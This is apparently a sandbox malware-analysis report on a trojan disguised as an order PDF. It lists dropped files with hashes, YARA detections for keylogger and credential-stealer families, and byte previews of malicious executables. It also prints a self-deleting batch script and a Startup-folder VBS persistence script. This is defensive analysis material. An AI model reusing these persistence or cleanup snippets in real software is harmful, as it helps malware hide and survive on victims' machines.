SSDEEP:	1536:iwa4JKXrrJUtuACC11BJVeSodqcyxCVf1UMR7pgpPYl4:O4JUXJUUACCzBJVeSOqcyi+MDgpP3
MD5:	D49B97C9900DA1344E4E8481551CC14C
SHA1:	53C7014EB195741A40B1D8CA061945FDE2AA567F
SHA-256:	53406CB7D67E3D71E30AD41AFF5A31B75652624A8641E0EA05F31650ABD3FE42
SHA-512:	8EC5B8E6EE9B0B906A730BC0057A4B4F244F65837828D781D766DA3D496C8CD2AE199CC15502098DF0E61C1287D24CF2810F916D5DA91D7F0B3F458E4CABCB73
Malicious:	true
Yara Hits:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Florian Roth
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..v.............. ........@.. ....................................`.................................x...S.................................................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc...............~..............@..B........................H.......t...........Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....&..( .....s!........s"........s#........s$........s%........Z........o8...........&..(9....&........".......Vs....(B...t...........(C..."~....+."~....+."~....+."~....+."~....+.b.r...p.oa...(....(@....:.~.....o....&.:.(P....(Q......~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...

C:\Users\user\AppData\Local\Temp\tmp32A9.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.002292602822862
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3Dt+kiE2J5xAIJxXZQDwU1hGDt+kiE2J5xAInTRI8XhIBQty:hWKdbuoLwkn23fJRuDNewkn23fTdE
MD5:	775C51482378A4127B397ED8C947D374
SHA1:	4E21556CE8D7E42BB50A818AD663F87D1FB9790C
SHA-256:	AF0543DFA90B7AEC037F8E6DD42827F81855A47ED9FE57C7BDB2AD3EDD969AA6
SHA-512:	9C287616C6F1EEFB1D12D1D8FA731D62D87A5A56B094CA55CB7A587BB0482AF82FE9C6F4BC63DF132ED0035C1576DF228C8CAA15D26F13FF0271DB1985DC8FDD
Malicious:	false
Reputation:	unknown
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "TrojanAI.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp32A9.tmp.cmd" /f /q..

C:\Users\user\AppData\Local\bothsided\surmit.exe

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2267648
Entropy (8bit):	7.644283654008633
Encrypted:	false
SSDEEP:	24576:ktb20p1aCqT5TBWgNQ7aFPXgTcE4K6O6Y22yGhfP+3YR5Qwcb6A2sqjnhMgeiCln:N6g5tQ7aFfarFYY3lu56Dmg27RnWGj
MD5:	EB8D251C25AB63697FB69A403AF0F09F
SHA1:	0D888453DF23F50C61ABBC8F2216D2FBE986716E
SHA-256:	9A759F2EF8EE16B697F30AAB51FC726F9697B338E0ABA56C063860146BBFC76B
SHA-512:	E066F17A6E42EACD053EAC6F5274A2FE4BEC4BD068B04D492D61AEA3B9A9AADA2E5A7228935862E7DFC51DBED083E69DE085525A2124702719DE6D1BB9B7EC92
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.../)Gg..........".................t_............@...........................#.......".......@.......@......................p..\|....@..P...........................................................0'..@...............`............................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc...P....@...0..................@..@.reloc.......p......................@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\314fa8116a46337b.bin

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.9861755873839275
Encrypted:	false
SSDEEP:	384:xy2KxflnX5lFVwwAnSle2ZFgHBptgMbadT5SfEK5:xy26pvFVknSltFgHZgmadT58
MD5:	5C323A7DFA2119735C37FECE46884C0C
SHA1:	7ACA0F11E92E36EAA0966F6C82E451F09FA1430F
SHA-256:	0AA02424B94DE4683BCCF4083835377129FCAC58F41212BAD4F7905B63B1235B
SHA-512:	CFE8986E5A729B5EF3BFEDC2214D7F03B7B85310E49F32C8E49184A7DFDD5798A64828A576A57D52B84DA9FD67EE47947CAE3D8ECCA6763A9F3F7C2DA3DF76B0
Malicious:	true
Reputation:	unknown
Preview:	.m.S.^...<......)f.....Ni....)...V....j.1......9.......Z..9%.P.T^.....q.(.{.Y.....b..TWR.1.I..;.....l^G.....R...d.a...:.x.Q]./3N....W.vJ'.....V.V.~/Z......x.w\|..jZ.p......R.(8h....W.H%=....h}.....y...S.&.z9GK....'.......q..U...fz.%.....;..p...ue]`.f.v....._+b%R@.b....Mnf..\|....\|0.a...:.Y.7tE........{.8..B.......k.fl.x...d..S..=..;.j.`.7.7.s~.%..Y.M".........1..a...Y.6w.].f...l..0HM....zv.>>...g.....W..?..."..HN<.\yh PP.n.5.N6........\|.?...UY4C.F...u.3^.I..@......t..~1.%l........Q.\\.T....e%.....EC..)....%<...%..h....9m.......[.2.^\|.}..YV.........S....U.c..Pzv..J~:.=g....q.\|K.4.d.....V..:./Tj.p.\.m9.s.}+....k.....s.`....4.....L7.=A...PFg.......YyF{........b...5.K9..K..hl.3.Ct.2u.R.\|s...).._....v........$i.....55....(~.,f.CC...3.g..k\|..S#.....\M..#.P.l..E6......%..\|..sK...:.w.].......I..!....+]....a.)..9..(.?..G.....Ke.b.;.},zW1.U\c$...g...5.d.....Y..K..iE.p.;X...`.5.E.R.LQn(.. B....;..*'.^..iwyTB.k.^KrRg....&.r...`.2~)xV.....r...

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Nov 28 04:41:06 2024, mtime=Thu Nov 28 04:41:06 2024, atime=Thu Nov 28 04:41:04 2024, length=231936, window=
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	3.474543387250036
Encrypted:	false
SSDEEP:	24:8lnNOyHgoPg+A6asMfpAJOs4FSnW9g+O4ZnIqgxvBm:8lnNOyH9o6aZfqh4+W9XZIqU
MD5:	088AFC0A1FCC32EE0B162FD4896B5F4A
SHA1:	F514C7DB7E122FBF06D7993AE71758C75173BA9A
SHA-256:	30F4A89C9F969C00FFEF9F7F38D6819337983D902986D2A7914A2FE7A3D00691
SHA-512:	BBE0B7FC2CA8D0FA298CC1E3BCC8F19A277176E45BEB71390703A8B488876D3038B2CC3E095833CBF3B397FF4B350F3CD2CACA41A6C09FBDDF51C90E0DA9589D
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...]...XA..]...XA..&Ee.XA............................:..DG..Yr?.D..U..k0.&...&......vk.v.....;..XA...F..XA......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^\|Y.-...........................%..A.p.p.D.a.t.a...B.V.1.....\|Y -..Roaming.@......CW.^\|Y -..........................j...R.o.a.m.i.n.g.....T.1.....\|Y$-..ACCApi..>......\|Y$-\|Y$-....S.........................A.C.C.A.p.i.....l.2.....\|Y#- .TROJAN~1.EXE..P......\|Y$-\|Y$-....T......................?..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......d...............-.......c.............O1.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.o.j.a.n.A.I...e.x.e.........%USERPROFILE%\AppData\Local\Temp\TrojanAI.exe.....................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs

Download File

Process:	C:\Users\user\AppData\Local\bothsided\surmit.exe
File Type:	data
Category:	dropped
Size (bytes):	272
Entropy (8bit):	3.4193687701939326
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloRKUEZ+lX1kysWXAAnriIM8lfQVn:DsO+vNloRKQ11sCmA2n
MD5:	5FD95E69F23A422DD2751A728C45BBC5
SHA1:	69BF42690BDD99B412A537D36C346D034149F239
SHA-256:	6EC64714B95AB8291E604522A7ADC6C2F11FFF94E96D7A27CC8A962DBAE8F85F
SHA-512:	BC0CEA6D3D350FF021CDC1BE1456FE47D9F3F550272D7EB6DF39129BFAA851ABCDF138BAA0CF947554EE0C86422826AA84A23A4F6E1F05245D4B7D9BF1E59B06
Malicious:	true
Reputation:	unknown
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.b.o.t.h.s.i.d.e.d.\.s.u.r.m.i.t...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Windows\DtcInstall.log

Download File

Process:	C:\Windows\System32\msdtc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	2313
Entropy (8bit):	5.133734133103374
Encrypted:	false
SSDEEP:	48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786y:Z070s0Y0q0mF7Dm5h
MD5:	D31BC51F39531011461670D48AB01DA3
SHA1:	5E37CCC3EF8F56372B1F079F9D6237673E72604F
SHA-256:	9D81C4CAB49337E10F7C98CE8BBA9D9CBEC38AE2F0239C3D7114404E0611E038
SHA-512:	0B9C50D603F76C78F46AABCD61453AE405FF41EAFD9E91631EB22CBA8EAB91F4490660CF05E38E95A2B8A4AC5AB32299B2AC43C76CA8A6EA2809DA6660789590
Malicious:	false
Reputation:	unknown
Preview:	12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

C:\Windows\SysWOW64\perfhost.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1150976
Entropy (8bit):	5.038919161187196
Encrypted:	false
SSDEEP:	12288:T+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:T+sqjnhMgeiCl7G0nehbGZpbD
MD5:	EDEE2BCBDEFD9AC7870413C713845ED0
SHA1:	93008FEE006A326D24CB5CFBB1E869FC937AE624
SHA-256:	09859ACA718902F17A661BD4CD710732C574D1BEB5298D2561EDF0E86D04C5A2
SHA-512:	DAEFF6CA5F3DF0D8B9F4C164421509A20CCA30822B265544ABBF91D60406AFF4BBFC69ECF635603672AD485914335FB03141294F1684E6A65A4694D13172F4DD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................K............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\AgentService.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	6.974349182933479
Encrypted:	false
SSDEEP:	49152:pwVFr68Vw9wn/6h8N1zid/Dmg27RnWGj:pwVFrssC/d/D527BWG
MD5:	8C93066C06466BC49D1C4E178AF4AD43
SHA1:	81EE331FCD4CD8B9B45FABEA2F4D18EB2CC4F75F
SHA-256:	C13BE2B6E429C4169D5FD26D1EAFB771A7618CB3523BD0D19DADC41A3359EE91
SHA-512:	E99FF38A6C10883C8AB9FE9405A9D57D41D59EC16BBFA7F2A022ED1644E573B41B1E3F6A2A5AC9CD3C15B018E26A6C79D547827A881357390BF15EACC4375238
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.253751675421666
Encrypted:	false
SSDEEP:	24576:+QW4qoNUgslKNX0Ip0MgHCpoMBOuysqjnhMgeiCl7G0nehbGZpbD:+QW9BKNX0IPgiKMBOu2Dmg27RnWGj
MD5:	6B5D6FF7CFD8D5165E8DF1E87AD43A65
SHA1:	CF09D2E34E54706EF4D51759034CC3ECD1E00F44
SHA-256:	B88633AEDAC8580DCD258FA28CE76DBFEB9C45FC6A2158191708AA299ECD6537
SHA-512:	3BD12C239AEE5F6B30765137D1AAE7B0289934EC75DDD4597D2BE5BECA75D60CE3B3F31A263EF89532AA0036941B6A057EEED777FE36FB18511CF3006D49821E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................E..... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1805824
Entropy (8bit):	6.253764820236852
Encrypted:	false
SSDEEP:	24576:c2G7AbHjk1sqjnhMgeiCl7G0nehbGZpbDKsqjnhMgeiCl7G0nehbGZpbD:c2G7AbHjMDmg27RnWGjmDmg27RnWGj
MD5:	38603E75595D5CCD23A21FC078DB763F
SHA1:	F34B47A30FB0F7F7F568DB6BF49CC81F7BE3016D
SHA-256:	AA4204150C69CD4C3CB422C64DF164BB6FE1EB4A9F55CF19B4153009683399D7
SHA-512:	E14F52A1BE28B5A2A44150039DCDDCB09AB7DF1D615BD79208916D70F81DB2958EA9E6288500F19B31A57337410EFDC306D7A423D607F2A5650B0D8309FB4A2E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................f.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...0....... ...n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1242624
Entropy (8bit):	7.2889873591794405
Encrypted:	false
SSDEEP:	24576:jkdpSI+K3S/GWei+qNv2uG3xsqjnhMgeiCl7G0nehbGZpbD:j6SIGGWei2uG3FDmg27RnWGj
MD5:	934580203C0979265F5057C0AFDE93EE
SHA1:	40BEEA4FBE6722C7CE72B5FBD7F9229C1110C773
SHA-256:	E63B93B2D0A502CDABBFD92EF4F952AF1427938DA28EF8E0D453D72EF814E1B7
SHA-512:	6CCE3B176A5BC85DA9511AAC2BC864B93415FB3D20A819867435FDB29575A657794981E95BB5F4A4C7F902151FE8E345A5DB2214D0884FB59E5B8A37435C1564
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......=a.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\Locator.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1141248
Entropy (8bit):	5.017535002735853
Encrypted:	false
SSDEEP:	12288:n6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:n6sqjnhMgeiCl7G0nehbGZpbD
MD5:	86DCD9A8939466521332C54DA596493F
SHA1:	82C9E5F7FF74B355CF2863C95857E063367CD124
SHA-256:	11094B61CC827D57BA0E1F60DC782B9DDB6EA0F8EE2646D14920775CCE67F843
SHA-512:	8EAB249AB3C170308DAA5243AD038EE63DE7899617BEDC1F9B921766393991EBAEFD85134918E69845B6B7CDFF49E76DAD6ED07DD83F30841CDEB4E4ABF14C76
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C."^".q^".q^".qWZ;qL".qJI.p_".qJI.p\".qJI.pO".q^".qy".qJI.p[".qJI.p]".qJIWq_".qJI.p_".qRich^".q........................PE..d...k(............".........."...... ..........@.....................................%.... .......... .......................................&.......P.......@......................0#..T............................ ..............(!..p............................text............................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc........P......."..............@..@.reloc...P...`...@...*..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\MsDtc\Trace\dtctrace.log

Download File

Process:	C:\Windows\System32\msdtc.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.3208021703001615
Encrypted:	false
SSDEEP:	6:gjJo//lr8ta/k/uMclF6vMclFq5zw8G3z8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+P:5r80kqF69Fq5z7GY6CzE5Z2+fqjF9t
MD5:	1F387E654F96F2B3703F98EE9C834A54
SHA1:	5A120D02D1DA44C0A0B394D9E38F5A64705FE0D1
SHA-256:	3FC540E7E6DDA9463FB35A6146BA8EFE08B689D7331BBE961EFA19492ED3651F
SHA-512:	1A60D7DD3C28A1C4D6248E5756C9780C8845776B90C4B2089883328E1FF4E4980AAFFCD6294035B3F8B18187D0C5930E28997D3C4FC0864ECC6D265A088420C6
Malicious:	false
Reputation:	unknown
Preview:	.@..X...X.......................................X...!...........................@...(...M-...............@......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............I(LaXA..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.............P.P.@...(...M-..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\OpenSSH\ssh-agent.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1511424
Entropy (8bit):	5.2229323111309816
Encrypted:	false
SSDEEP:	12288:LObHA4LWOsvAYFTZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:UjL3UTZsqjnhMgeiCl7G0nehbGZpbD
MD5:	0439F7048F8E10BA176B005D74928BC2
SHA1:	A9573D7D763732DDA8758F36FB288271E650A37B
SHA-256:	0EB8660921816469B64108B72C60494C94FF7D0E3BACDEC29F2C5806AF4CA94A
SHA-512:	25DA176B467C85160A3E1B22FB07D2F0AFF14583B13E0E4BA88FE93B966C8E32AB3BAB62805FAD5171FEDB6D124246AB84B1DCF98040BDE186DA4135DB13521A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D\|.%...%...%...C...%...C...%...C..{%.....%...{...%...{...%...{...%...]...%../L...%...%..6$..&{...%..&{.%...%...%..&{...%..Rich.%..................PE..d.....q^.........."..........:.......i.........@....................................?u.... ......................................................... ..x.......T...................P..p...........................`Q..................8............................text............................... ..`.rdata..............................@..@.data....I..........................@....pdata..T*.......,..................@..@.rsrc...x.... ......................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................

C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1235968
Entropy (8bit):	5.182225841231713
Encrypted:	false
SSDEEP:	12288:wpFtQO1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DO1sqjnhMgeiCl7G0nehbGZpbD
MD5:	1117B1EA19B83A43DDF7D75C7D8D4433
SHA1:	4B8194BB56897C7E5F3CB480B287465BA8224277
SHA-256:	A7DD9A91B061129CFB8507ACD60401AE535179B91ABAEC2DB47EFBA8AB3F3709
SHA-512:	37758940AAC640174B692761F41BC38F8716219D8654FDB906D6349610D19437F543D58408C2D1D3D3B4E95D45F03BA59DA2E2EE9714CABD93F3C5512281FBBC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@A...A...A...H.......U...K...U...B...A.....U...F...U...N...U...e...U.t.@...U.v.@...U...@...RichA...................PE..d...6............".................0..........@....................................m!.... .......... ......................................Xq..........x............................S..T...................(..(....)..............P...............................text...@........................... ..`.rdata...n... ...p..................@..@.data...............................@....pdata..............................@..@.rsrc...x...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................................

C:\Windows\System32\SearchIndexer.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1513984
Entropy (8bit):	7.102423346263835
Encrypted:	false
SSDEEP:	24576:X3frCoQItLsiLPLe24CxruW4bIhllZsqjnhMgeiCl7G0nehbGZpbD:X3fzsIPLkCNuVbIhDdDmg27RnWGj
MD5:	CD1C859B52A6FAF97163439E2CD0FD1F
SHA1:	588577509088AC63ADC1772EF59CFC5873382BE3
SHA-256:	444EF6DE4D4B40662F99B472F61D3A657A73AF9F25CE8DC8AC1A6CD2E480E591
SHA-512:	1180319E4382B07436594D11BFF86454507F3B05D2F30C13286BFCF84E97853EA2D9B74EA1A8916AB695D1EEAE91DC791054C212516486BA26A6169995A31970
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................z............................................l............Rich............PE..d.................".................0..........@.....................................L.... .................................................HL..........(...........................P...T...................P...(... ........................<.......................text...9........................... ..`.rdata..............................@..@.data....:...........p..............@....pdata..............................@..@.didat.......p......................@....rsrc...(............ ..............@..@.reloc...............*..............@...................................................................................................................................................................................................................................

C:\Windows\System32\SensorDataService.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1846784
Entropy (8bit):	6.9394684584266875
Encrypted:	false
SSDEEP:	24576:DW6BApg2YuyuNDYTabvcRvNYf8km1wsqjnhMgeiCl7G0nehbGZpbD:DF2YuHNETovcvNYf8kmCDmg27RnWGj
MD5:	5A91E900A0DA58344972F0D6FA4C072C
SHA1:	ED57120D89B2A8A21067A5C8F3DA2FDC70FBE1F9
SHA-256:	D560342E61AE6951CD79C542985D46522FD7505737944A949E871FA893D4304B
SHA-512:	3794321BE94E833586D9A3B1AE84A7DBD0B23E10AEAF77B1462DD0E681AE7E1C423EF91765EFAC111F85676AB2D78DC94B9A04DD871F5CB7754E7B3679193E29
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W`............yA.K...j...........j.....j.....j.....j.0...j-.....j....Rich...........................PE..d................."......"...(......@..........@.............................p......Y=.... .......... .......................................~..H....`..`........................... t..T...........................0w..............Hx..p............................text....!.......".................. ..`.rdata..P^...@...`...&..............@..@.data...............................@....pdata..............................@..@.rsrc...`....`.......6..............@..@.reloc.......p.......>..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\Spectrum.exe

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1455616
Entropy (8bit):	7.238919082418517
Encrypted:	false
SSDEEP:	24576:7iW6ZvAKF5i/dN9Bdexj9Trk+F1sqjnhMgeiCl7G0nehbGZpbD:7YxF50b9Bdm9Tx3Dmg27RnWGj
